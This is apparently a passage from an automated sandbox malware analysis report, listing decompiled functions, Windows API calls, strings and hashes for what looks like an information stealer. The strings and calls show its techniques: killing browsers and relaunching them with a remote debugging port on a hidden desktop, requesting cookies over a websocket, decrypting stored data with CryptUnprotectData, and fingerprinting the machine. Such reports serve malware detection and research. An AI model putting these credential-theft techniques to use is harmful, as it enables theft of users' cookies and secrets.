                              • wsprintfA.USER32 ref: 00E4CDD8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E4CDF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00E4CE10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E4CE28
                              • CloseHandle.KERNEL32(00000000), ref: 00E4CE33
                              • CloseHandle.KERNEL32(00000000), ref: 00E4CE3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E4CE54
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4CE94
                              • FindNextFileA.KERNEL32(?,?), ref: 00E4CF8D
                              • FindClose.KERNEL32(?), ref: 00E4CF9F
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: 4d8f456c8800d8d2948232b872e0072609f5548a1ca2559be4505fae472e271d
                              • Instruction ID: 8287d313b1ff9bcaca1320cf548143df10b62f3130f21d63df298c26c0f6274c
                              • Opcode Fuzzy Hash: 4d8f456c8800d8d2948232b872e0072609f5548a1ca2559be4505fae472e271d
                              • Instruction Fuzzy Hash: FEC17271A003089FDB60DF64EC49AEE77B9BF44304F109599F649A7284EB35AE44CFA0
                              APIs
                              • memset.MSVCRT ref: 00E39790
                              • lstrcat.KERNEL32(?,?), ref: 00E397A0
                              • lstrcat.KERNEL32(?,?), ref: 00E397B1
                              • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00E397C3
                              • memset.MSVCRT ref: 00E397D7
                                • Part of subcall function 00E53E70: lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E53EA5
                                • Part of subcall function 00E53E70: lstrcpy.KERNEL32(00000000,00D2F010), ref: 00E53ECF
                                • Part of subcall function 00E53E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00E3134E,?,0000001A), ref: 00E53ED9
                              • wsprintfA.USER32 ref: 00E39806
                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00E39827
                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00E39844
                                • Part of subcall function 00E546A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E546B9
                                • Part of subcall function 00E546A0: Process32First.KERNEL32(00000000,00000128), ref: 00E546C9
                                • Part of subcall function 00E546A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E546DB
                                • Part of subcall function 00E546A0: StrCmpCA.SHLWAPI(?,?), ref: 00E546ED
                                • Part of subcall function 00E546A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E54702
                                • Part of subcall function 00E546A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E54711
                                • Part of subcall function 00E546A0: CloseHandle.KERNEL32(00000000), ref: 00E54718
                                • Part of subcall function 00E546A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E54726
                                • Part of subcall function 00E546A0: CloseHandle.KERNEL32(00000000), ref: 00E54731
                              • memset.MSVCRT ref: 00E39862
                              • lstrcat.KERNEL32(00000000,?), ref: 00E39878
                              • lstrcat.KERNEL32(00000000,?), ref: 00E39889
                              • lstrcat.KERNEL32(00000000,00E64B60), ref: 00E3989B
                              • memset.MSVCRT ref: 00E398AF
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E398D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E39903
                              • StrStrA.SHLWAPI(00000000,00D2F3C8), ref: 00E39919
                              • lstrcpyn.KERNEL32(010693D0,00000000,00000000), ref: 00E39938
                              • lstrlen.KERNEL32(?), ref: 00E3994B
                              • wsprintfA.USER32 ref: 00E3995B
                              • lstrcpy.KERNEL32(?,00000000), ref: 00E39971
                              • memset.MSVCRT ref: 00E39986
                              • Sleep.KERNEL32(00001388), ref: 00E399E7
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E392E1
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E392FA
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E39399
                                • Part of subcall function 00E392B0: strlen.MSVCRT ref: 00E393E6
                                • Part of subcall function 00E54740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E54759
                                • Part of subcall function 00E54740: Process32First.KERNEL32(00000000,00000128), ref: 00E54769
                                • Part of subcall function 00E54740: Process32Next.KERNEL32(00000000,00000128), ref: 00E5477B
                                • Part of subcall function 00E54740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5479C
                                • Part of subcall function 00E54740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E547AB
                                • Part of subcall function 00E54740: CloseHandle.KERNEL32(00000000), ref: 00E547B2
                                • Part of subcall function 00E54740: Process32Next.KERNEL32(00000000,00000128), ref: 00E547C0
                                • Part of subcall function 00E54740: CloseHandle.KERNEL32(00000000), ref: 00E547CB
                              • CloseDesktop.USER32(?), ref: 00E39A1C
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                              • API String ID: 2040986984-1862457068
                              • Opcode ID: 9a08e9768f385e786fe8bbd0d5007a743b5e80db93d75063fdf5061477ebf5b7
                              • Instruction ID: 96f029e3396e339a0e3af98174eb8b1aecfa09ae8b4b177b3ccfe1ae04d51223
                              • Opcode Fuzzy Hash: 9a08e9768f385e786fe8bbd0d5007a743b5e80db93d75063fdf5061477ebf5b7
                              • Instruction Fuzzy Hash: 13919371A00318AFDB20DFB4DC89FDE77B8AF48704F109599F649A7181DB75AA44CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E41291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E412BF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E412CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412E7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E412F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4133A
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4135C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E41376
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E413AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E413D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E413E2
                              • lstrlen.KERNEL32(00E61794), ref: 00E413ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4140A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41416
                              • lstrlen.KERNEL32(?), ref: 00E41423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41443
                              • lstrcat.KERNEL32(00000000,?), ref: 00E41451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4147A
                              • StrCmpCA.SHLWAPI(?,00D2E000), ref: 00E414A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E414E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41535
                              • StrCmpCA.SHLWAPI(?,00D2E158), ref: 00E41552
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41593
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E415BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E415E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E417F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4181C
                              • FindClose.KERNEL32(00000000), ref: 00E4182B
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 6cccf8965bc42a9d25884724df824742b0131317210df8f8acadb3d363839766
                              • Instruction ID: 774374244ab65f53e7b4ee0b24195c9498c17ccca87b48174be103b5ac2619d3
                              • Opcode Fuzzy Hash: 6cccf8965bc42a9d25884724df824742b0131317210df8f8acadb3d363839766
                              • Instruction Fuzzy Hash: D8C17F31A103069FCF21EF68E889AAE7BF8AF44308F056568F985B7251DB35DC45CB90
                              APIs
                              • wsprintfA.USER32 ref: 00E4E22C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4E243
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4E263
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4E27D
                              • wsprintfA.USER32 ref: 00E4E2A2
                              • StrCmpCA.SHLWAPI(?,00E5CFEC), ref: 00E4E2B4
                              • wsprintfA.USER32 ref: 00E4E2D1
                                • Part of subcall function 00E4EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E4EE12
                              • wsprintfA.USER32 ref: 00E4E2F0
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 00E4E304
                              • lstrcat.KERNEL32(?,00D2F950), ref: 00E4E335
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4E347
                              • lstrcat.KERNEL32(?,?), ref: 00E4E358
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4E36A
                              • lstrcat.KERNEL32(?,?), ref: 00E4E37E
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E4E394
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E3D2
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E422
                              • DeleteFileA.KERNEL32(?), ref: 00E4E45C
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4E49B
                              • FindClose.KERNEL32(00000000), ref: 00E4E4AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: 65b3ef6112fe3adf0de1036081f30a8df9d29aac1c57736f2de3e7f6af3ad0d2
                              • Instruction ID: 4cc2cf514a531717413d1518332dd5bce2405bbf54aa68d13d62c4da2c49628a
                              • Opcode Fuzzy Hash: 65b3ef6112fe3adf0de1036081f30a8df9d29aac1c57736f2de3e7f6af3ad0d2
                              • Instruction Fuzzy Hash: 898182719003189FCB20EF74EC49AEE77B9BF44304F009999F65AA7255DB35AA44CFA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E316E2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3176C
                              • lstrcat.KERNEL32(00000000), ref: 00E31776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E317A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E318F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E318FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: 81fa6aa1cb18e9877b5f18724940ccaf27611a6197ac91fba46cbcae03aca99b
                              • Instruction ID: 36415f50e36cb636542a730d13a2d013d77ed92d89d186b8281c0cf05ce3bd3f
                              • Opcode Fuzzy Hash: 81fa6aa1cb18e9877b5f18724940ccaf27611a6197ac91fba46cbcae03aca99b
                              • Instruction Fuzzy Hash: 2E816D319102199FCB21EF68D88DAAE7FF4AF44308F14616DFA85BB255CB359D01CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E4DD45
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E4DD4C
                              • wsprintfA.USER32 ref: 00E4DD62
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4DD79
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4DD9C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4DDB6
                              • wsprintfA.USER32 ref: 00E4DDD4
                              • DeleteFileA.KERNEL32(?), ref: 00E4DE20
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00E4DDED
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                                • Part of subcall function 00E4D980: memset.MSVCRT ref: 00E4D9A1
                                • Part of subcall function 00E4D980: memset.MSVCRT ref: 00E4D9B3
                                • Part of subcall function 00E4D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4D9DB
                                • Part of subcall function 00E4D980: lstrcpy.KERNEL32(00000000,?), ref: 00E4DA0E
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,00000000), ref: 00E4DA1C
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,00D2F320), ref: 00E4DA36
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,?), ref: 00E4DA4A
                                • Part of subcall function 00E4D980: lstrcat.KERNEL32(?,00D2E030), ref: 00E4DA5E
                                • Part of subcall function 00E4D980: lstrcpy.KERNEL32(00000000,?), ref: 00E4DA8E
                                • Part of subcall function 00E4D980: GetFileAttributesA.KERNEL32(00000000), ref: 00E4DA95
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4DE2E
                              • FindClose.KERNEL32(00000000), ref: 00E4DE3D
                              • lstrcat.KERNEL32(?,00D2F950), ref: 00E4DE66
                              • lstrcat.KERNEL32(?,00D2E478), ref: 00E4DE7A
                              • lstrlen.KERNEL32(?), ref: 00E4DE84
                              • lstrlen.KERNEL32(?), ref: 00E4DE92
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4DED2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: afbb85925bd7896f8343471b74309be9466f0c147958b1694b5ba176d6805646
                              • Instruction ID: 6dd05cef9817643c87db91028f1c75f489832b4c7cb6801221014c4fb9a91223
                              • Opcode Fuzzy Hash: afbb85925bd7896f8343471b74309be9466f0c147958b1694b5ba176d6805646
                              • Instruction Fuzzy Hash: F8616271910208AFCB21EF74EC89AEE7BB9BF48304F0055A9F685E7255DB35AA44CB50
                              APIs
                              • wsprintfA.USER32 ref: 00E4D54D
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E4D564
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4D584
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E4D59E
                              • lstrcat.KERNEL32(?,00D2F950), ref: 00E4D5E3
                              • lstrcat.KERNEL32(?,00D2F940), ref: 00E4D5F7
                              • lstrcat.KERNEL32(?,?), ref: 00E4D60B
                              • lstrcat.KERNEL32(?,?), ref: 00E4D61C
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4D62E
                              • lstrcat.KERNEL32(?,?), ref: 00E4D642
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4D682
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4D6D2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E4D737
                              • FindClose.KERNEL32(00000000), ref: 00E4D746
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: 6dafdee633c15983d89059d6111631b4b6a089c20b95236ac35119d6fca7d452
                              • Instruction ID: 1a2bfe2d47e2fedfa7cd08aad00ee7fcc5cb56727adfbc84a8df2d16166b0058
                              • Opcode Fuzzy Hash: 6dafdee633c15983d89059d6111631b4b6a089c20b95236ac35119d6fca7d452
                              • Instruction Fuzzy Hash: 816152719102199FDF20EF74DC88ADE7BB8EF48304F0095A9F689A7255DB35AA44CF90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-758292691
                              • Opcode ID: 469908c96ac61531d5ff3ddd4c0e374691c131a8fc8e2b5aa8d704f5f4902d35
                              • Instruction ID: ff2e3541ea5b8a4d25419bcbf967d12c054415c2167b65138ce90b1b7e45f3e4
                              • Opcode Fuzzy Hash: 469908c96ac61531d5ff3ddd4c0e374691c131a8fc8e2b5aa8d704f5f4902d35
                              • Instruction Fuzzy Hash: FDA26B71E012199FDB20CFA8C8507EDBBB5EF44301F1485AAE919B7281DB715E89CF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E423D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E423F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E42402
                              • lstrlen.KERNEL32(\*.*), ref: 00E4240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E42436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E42486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 8cc83e6f4fd522ac71926f924abe0f2c20fc423d23ba35764a3ca01d06a30431
                              • Instruction ID: 0b30ea8b0b39c96abc2ddebce48f5add01037abb58cd7009de18b3dbac0cc8a5
                              • Opcode Fuzzy Hash: 8cc83e6f4fd522ac71926f924abe0f2c20fc423d23ba35764a3ca01d06a30431
                              • Instruction Fuzzy Hash: ED4130316113158BCB32EF68E889A9E7BE4AF54308F44712CFA99BB111CB359C41DB90
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E546B9
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E546C9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E546DB
                              • StrCmpCA.SHLWAPI(?,?), ref: 00E546ED
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E54702
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E54711
                              • CloseHandle.KERNEL32(00000000), ref: 00E54718
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E54726
                              • CloseHandle.KERNEL32(00000000), ref: 00E54731
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00E54628
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E54638
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E5464A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00E54660
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E54672
                              • CloseHandle.KERNEL32(00000000), ref: 00E5467D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E44B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44B7F
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E44B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BA7
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E44BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E44BFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID:
                              • API String ID: 2567437900-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !Sm$69<$A\72$ST?$nf:s$o_w$23~${m9
                              • API String ID: 0-291933977
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &iv$*nzy$=^}m$Bue}$Fzgo$ae]$1rW$wi
                              • API String ID: 0-2135711657
                              APIs
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E52D9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E52DAD
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E52DBA
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E52DEC
                              • LocalFree.KERNEL32(00000000), ref: 00E52FCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 9Xq$[eun$\Tv$_eun$b+z$c[{
                              • API String ID: 0-2570880226
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ',Wg$B)7M$F>K$V{{$tjm$}{
                              • API String ID: 0-3214189499
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E52C42
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52C49
                              • GetTimeZoneInformation.KERNEL32(?), ref: 00E52C58
                              • wsprintfA.USER32 ref: 00E52C83
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0kG[$4k~g$A7D$Gb/7$\vu
                              • API String ID: 0-1705580044
                              • Opcode ID: 39199022f56fab55b51a5c465536dac2514f1c12743149ec1deea9d276b07e07
                              • Instruction ID: c073dbb52df73d500d56570c81fd2fe1a90f7121da33c0f4138bc5e91fc15f88
                              • Opcode Fuzzy Hash: 39199022f56fab55b51a5c465536dac2514f1c12743149ec1deea9d276b07e07
                              • Instruction Fuzzy Hash: 6CB207F3A0C2049FE3046E2DEC8566AFBE9EF94760F1A453DEAC4C3744EA3558058697
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E3775E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E37765
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E3778D
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E377AD
                              • LocalFree.KERNEL32(?), ref: 00E377B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
